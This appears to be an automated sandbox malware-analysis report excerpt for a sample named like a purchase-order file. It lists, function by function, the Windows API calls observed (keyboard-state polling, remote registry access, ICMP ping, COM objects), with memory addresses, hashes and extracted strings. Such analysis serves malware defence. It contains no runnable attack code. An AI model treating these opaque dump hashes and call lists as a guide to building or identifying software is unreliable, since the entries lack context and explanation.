                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: SendString$_wcslen
                                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                    • API String ID: 2420728520-1007645807
                                                                                    • Opcode ID: 24a3688a1d8ac9ab0aaae7588e089227a2443311f30db7a94a377ccd9f65a3c0
                                                                                    • Instruction ID: 8df496c8acaaddacd70d1ccb8936bb54f4af020428ca478795741307a43038ec
                                                                                    • Opcode Fuzzy Hash: 24a3688a1d8ac9ab0aaae7588e089227a2443311f30db7a94a377ccd9f65a3c0
                                                                                    • Instruction Fuzzy Hash: 22112135AA025D79E720A7A5DC4EEFF7ABCEBD2B00F440429B411A34E2EB705965C5B0
                                                                                    APIs
                                                                                    • GetDlgItem.USER32(?,00000001), ref: 001A5CE2
                                                                                    • GetWindowRect.USER32(00000000,?), ref: 001A5CFB
                                                                                    • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 001A5D59
                                                                                    • GetDlgItem.USER32(?,00000002), ref: 001A5D69
                                                                                    • GetWindowRect.USER32(00000000,?), ref: 001A5D7B
                                                                                    • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 001A5DCF
                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 001A5DDD
                                                                                    • GetWindowRect.USER32(00000000,?), ref: 001A5DEF
                                                                                    • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 001A5E31
                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 001A5E44
                                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 001A5E5A
                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 001A5E67
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                                    • String ID:
                                                                                    • API String ID: 3096461208-0
                                                                                    • Opcode ID: 603965d3c30a1d57539143f64ed1b269a3c70754491f8d95b9f3fa41ba283aed
                                                                                    • Instruction ID: a6c551676e9944193a38bb168534c13d1556080757bedaab4a88960a4461ac1a
                                                                                    • Opcode Fuzzy Hash: 603965d3c30a1d57539143f64ed1b269a3c70754491f8d95b9f3fa41ba283aed
                                                                                    • Instruction Fuzzy Hash: E5513074B01616AFDF18CFA8CD89AAEBBB6FB49310F108129F515E7690D7709E40CB60
                                                                                    APIs
                                                                                      • Part of subcall function 00158F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00158BE8,?,00000000,?,?,?,?,00158BBA,00000000,?), ref: 00158FC5
                                                                                    • DestroyWindow.USER32(?), ref: 00158C81
                                                                                    • KillTimer.USER32(00000000,?,?,?,?,00158BBA,00000000,?), ref: 00158D1B
                                                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 00196973
                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00158BBA,00000000,?), ref: 001969A1
                                                                                    • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00158BBA,00000000,?), ref: 001969B8
                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00158BBA,00000000), ref: 001969D4
                                                                                    • DeleteObject.GDI32(00000000), ref: 001969E6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                    • String ID:
                                                                                    • API String ID: 641708696-0
                                                                                    • Opcode ID: caf89d8f828f09cb4edccfe23153a4b52adc84bcf7b75ccc494dcd1a843e0653
                                                                                    • Instruction ID: 9fc043a26e53c1f9d9860fa48f2a7d0a201ee63438a0de849424868d4363e315
                                                                                    • Opcode Fuzzy Hash: caf89d8f828f09cb4edccfe23153a4b52adc84bcf7b75ccc494dcd1a843e0653
                                                                                    • Instruction Fuzzy Hash: A2619D30502701DFDF259F14D948BAAB7F1FB50316F148919E562AB960CB71AC94DFA0
                                                                                    APIs
                                                                                      • Part of subcall function 00159944: GetWindowLongW.USER32(?,000000EB), ref: 00159952
                                                                                    • GetSysColor.USER32(0000000F), ref: 00159862
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ColorLongWindow
                                                                                    • String ID:
                                                                                    • API String ID: 259745315-0
                                                                                    • Opcode ID: 9b270f76f2299aa5234ed61c8736848aacd94a2575cf019b7cf0f37853e44fa9
                                                                                    • Instruction ID: 3145128e06a9d2ac0a68cf7ed8a975e4afd45bd846a93fe9bf63b702860608cf
                                                                                    • Opcode Fuzzy Hash: 9b270f76f2299aa5234ed61c8736848aacd94a2575cf019b7cf0f37853e44fa9
                                                                                    • Instruction Fuzzy Hash: 1441AF31105654EFDF205F38DC88BB93BA5AB06332F154A06F9B28F2E1D7319885DB52
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0018F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 001A9717
                                                                                    • LoadStringW.USER32(00000000,?,0018F7F8,00000001), ref: 001A9720
                                                                                      • Part of subcall function 00149CB3: _wcslen.LIBCMT ref: 00149CBD
                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0018F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 001A9742
                                                                                    • LoadStringW.USER32(00000000,?,0018F7F8,00000001), ref: 001A9745
                                                                                    • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 001A9866
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleLoadModuleString$Message_wcslen
                                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                    • API String ID: 747408836-2268648507
                                                                                    • Opcode ID: 51739dfe3a31ed51b87cf9ea9883f80cf93bd326418041d379ef1efe3ee6d890
                                                                                    • Instruction ID: 3d48dfcb84665d631612fb0bc955c086909cef1d513bc9762e6d00c3146e313a
                                                                                    • Opcode Fuzzy Hash: 51739dfe3a31ed51b87cf9ea9883f80cf93bd326418041d379ef1efe3ee6d890
                                                                                    • Instruction Fuzzy Hash: 51414E72800219AADF14EFE0DD86DEFB778AF26340F500065F605760A2EB356F59CBA1
                                                                                    APIs
                                                                                      • Part of subcall function 00146B57: _wcslen.LIBCMT ref: 00146B6A
                                                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 001A07A2
                                                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 001A07BE
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 001A07DA
                                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 001A0804
                                                                                    • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 001A082C
                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 001A0837
                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 001A083C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                    • API String ID: 323675364-22481851
                                                                                    • Opcode ID: 86b084335eae5a86336d036e83b64053bb216fc7d336ebbe22043574795feff6
                                                                                    • Instruction ID: 94e81a818098d30d9f7b850def59ecafadd2f0542a6f2f93212383c133d5452d
                                                                                    • Opcode Fuzzy Hash: 86b084335eae5a86336d036e83b64053bb216fc7d336ebbe22043574795feff6
                                                                                    • Instruction Fuzzy Hash: 4D410476C11229ABDF11EFA4DC958EEB778FF18350F45412AE901A31A1EB309E44CBA0
                                                                                    APIs
                                                                                    • VariantInit.OLEAUT32(?), ref: 001C3C5C
                                                                                    • CoInitialize.OLE32(00000000), ref: 001C3C8A
                                                                                    • CoUninitialize.OLE32 ref: 001C3C94
                                                                                    • _wcslen.LIBCMT ref: 001C3D2D
                                                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 001C3DB1
                                                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 001C3ED5
                                                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 001C3F0E
                                                                                    • CoGetObject.OLE32(?,00000000,001DFB98,?), ref: 001C3F2D
                                                                                    • SetErrorMode.KERNEL32(00000000), ref: 001C3F40
                                                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001C3FC4
                                                                                    • VariantClear.OLEAUT32(?), ref: 001C3FD8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 429561992-0
                                                                                    • Opcode ID: 822a74c1bf9687463c51ba65725d3c43db9e5bd15990d36fe2790ff507fc7abf
                                                                                    • Instruction ID: c28af968247d8adcfca4660e5af5d25d67f6f23e77fe11ea636227664e464bdd
                                                                                    • Opcode Fuzzy Hash: 822a74c1bf9687463c51ba65725d3c43db9e5bd15990d36fe2790ff507fc7abf
                                                                                    • Instruction Fuzzy Hash: 9CC123716082059FD700DF68C884E6BB7E9FF99744F00891DF99A9B260D730EE46CB92
                                                                                    APIs
                                                                                    • CoInitialize.OLE32(00000000), ref: 001B7AF3
                                                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 001B7B8F
                                                                                    • SHGetDesktopFolder.SHELL32(?), ref: 001B7BA3
                                                                                    • CoCreateInstance.OLE32(001DFD08,00000000,00000001,00206E6C,?), ref: 001B7BEF
                                                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 001B7C74
                                                                                    • CoTaskMemFree.OLE32(?,?), ref: 001B7CCC
                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 001B7D57
                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 001B7D7A
                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 001B7D81
                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 001B7DD6
                                                                                    • CoUninitialize.OLE32 ref: 001B7DDC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                    • String ID:
                                                                                    • API String ID: 2762341140-0
                                                                                    • Opcode ID: fe1fe1bf67152a5835380c3c528b9e3561fae508a2204500ce8edb53f650660c
                                                                                    • Instruction ID: ffa5d0c71054c43b0bcd439decef4ef3c61823e6c73f53175a6699994c51014e
                                                                                    • Opcode Fuzzy Hash: fe1fe1bf67152a5835380c3c528b9e3561fae508a2204500ce8edb53f650660c
                                                                                    • Instruction Fuzzy Hash: BCC11A75A05109AFCB14DFA4C894DAEBBF9FF48304B148499E81ADB7A1D730EE45CB90
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 001D5504
                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001D5515
                                                                                    • CharNextW.USER32(00000158), ref: 001D5544
                                                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 001D5585
                                                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 001D559B
                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001D55AC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$CharNext
                                                                                    • String ID:
                                                                                    • API String ID: 1350042424-0
                                                                                    • Opcode ID: f1f8ac76efc12b8795485de61f21b56b0fa2cda16348cb2f328909bcf6602aee
                                                                                    • Instruction ID: 94507905809a10cad940bf8c064fcb1596de7a94156ce33a1476f7ef96d7130a
                                                                                    • Opcode Fuzzy Hash: f1f8ac76efc12b8795485de61f21b56b0fa2cda16348cb2f328909bcf6602aee
                                                                                    • Instruction Fuzzy Hash: 9F618D30901609EBDF149F54DC84EFE7BBAEB09764F10854BF925A6390D7748A80DBA1
                                                                                    APIs
                                                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0019FAAF
                                                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 0019FB08
                                                                                    • VariantInit.OLEAUT32(?), ref: 0019FB1A
                                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 0019FB3A
                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 0019FB8D
                                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 0019FBA1
                                                                                    • VariantClear.OLEAUT32(?), ref: 0019FBB6
                                                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 0019FBC3
                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0019FBCC
                                                                                    • VariantClear.OLEAUT32(?), ref: 0019FBDE
                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0019FBE9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                    • String ID:
                                                                                    • API String ID: 2706829360-0
                                                                                    • Opcode ID: ee83b951bf524f527d8543e1b5cce79d06e195eb55486dbc244082d109acd932
                                                                                    • Instruction ID: 8a313359bdcd5e08dccf277eb87d808d14acfc80eba65176cfdb6a9e15ce03b8
                                                                                    • Opcode Fuzzy Hash: ee83b951bf524f527d8543e1b5cce79d06e195eb55486dbc244082d109acd932
                                                                                    • Instruction Fuzzy Hash: 55415F35A0121AEFCF04DF68C8549EEBBB9EF18344F008469E916E7661CB34A946CBD0
                                                                                    APIs
                                                                                    • GetKeyboardState.USER32(?), ref: 001A9CA1
                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 001A9D22
                                                                                    • GetKeyState.USER32(000000A0), ref: 001A9D3D
                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 001A9D57
                                                                                    • GetKeyState.USER32(000000A1), ref: 001A9D6C
                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 001A9D84
                                                                                    • GetKeyState.USER32(00000011), ref: 001A9D96
                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 001A9DAE
                                                                                    • GetKeyState.USER32(00000012), ref: 001A9DC0
                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 001A9DD8
                                                                                    • GetKeyState.USER32(0000005B), ref: 001A9DEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: State$Async$Keyboard
                                                                                    • String ID:
                                                                                    • API String ID: 541375521-0
                                                                                    • Opcode ID: 58d64cba86da089d7c814e81b0e1e23ab09a279863e4ee7939ae8284cd023d58
                                                                                    • Instruction ID: 158d5039ac290520da849835b12e787d9719269bfaa03b7914a97d208b1ff951
                                                                                    • Opcode Fuzzy Hash: 58d64cba86da089d7c814e81b0e1e23ab09a279863e4ee7939ae8284cd023d58
                                                                                    • Instruction Fuzzy Hash: F541DA38605BCA6DFF3197B0C8443B5BEE06F13354F04805ADAC65A5C2EBA599C8C792
                                                                                    APIs
                                                                                    • WSAStartup.WSOCK32(00000101,?), ref: 001C05BC
                                                                                    • inet_addr.WSOCK32(?), ref: 001C061C
                                                                                    • gethostbyname.WSOCK32(?), ref: 001C0628
                                                                                    • IcmpCreateFile.IPHLPAPI ref: 001C0636
                                                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 001C06C6
                                                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 001C06E5
                                                                                    • IcmpCloseHandle.IPHLPAPI(?), ref: 001C07B9
                                                                                    • WSACleanup.WSOCK32 ref: 001C07BF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                    • String ID: Ping
                                                                                    • API String ID: 1028309954-2246546115
                                                                                    • Opcode ID: 960672e4682cb1b6dafc398f59cd034e9edc882f97da7261d12ed5891a1d6d82
                                                                                    • Instruction ID: 3c68d58e774a66d93033247f8b87c5f5ce2f59de32947aae696fc1f3f9dceff3
                                                                                    • Opcode Fuzzy Hash: 960672e4682cb1b6dafc398f59cd034e9edc882f97da7261d12ed5891a1d6d82
                                                                                    • Instruction Fuzzy Hash: 3E918C35609301DFD725CF15C889F1ABBE0AF58318F1589ADE4A98BAA2C730ED45CF81
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$BuffCharLower
                                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                                    • API String ID: 707087890-567219261
                                                                                    • Opcode ID: 39faa4d8c63ad9583ae6ca829e5ac1ed4f722eaa9d0a835c83d84dbd2710f8b3
                                                                                    • Instruction ID: eaf1fbe081c803483e1e15260c6dc36add7bd0b98133a2308fe51aabc882376f
                                                                                    • Opcode Fuzzy Hash: 39faa4d8c63ad9583ae6ca829e5ac1ed4f722eaa9d0a835c83d84dbd2710f8b3
                                                                                    • Instruction Fuzzy Hash: 8F518F31A001169BCB14DFACC991ABEB7A6BF75724B21422DE826E72C5DB31DD40C790
                                                                                    APIs
                                                                                    • CoInitialize.OLE32 ref: 001C3774
                                                                                    • CoUninitialize.OLE32 ref: 001C377F
                                                                                    • CoCreateInstance.OLE32(?,00000000,00000017,001DFB78,?), ref: 001C37D9
                                                                                    • IIDFromString.OLE32(?,?), ref: 001C384C
                                                                                    • VariantInit.OLEAUT32(?), ref: 001C38E4
                                                                                    • VariantClear.OLEAUT32(?), ref: 001C3936
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                    • API String ID: 636576611-1287834457
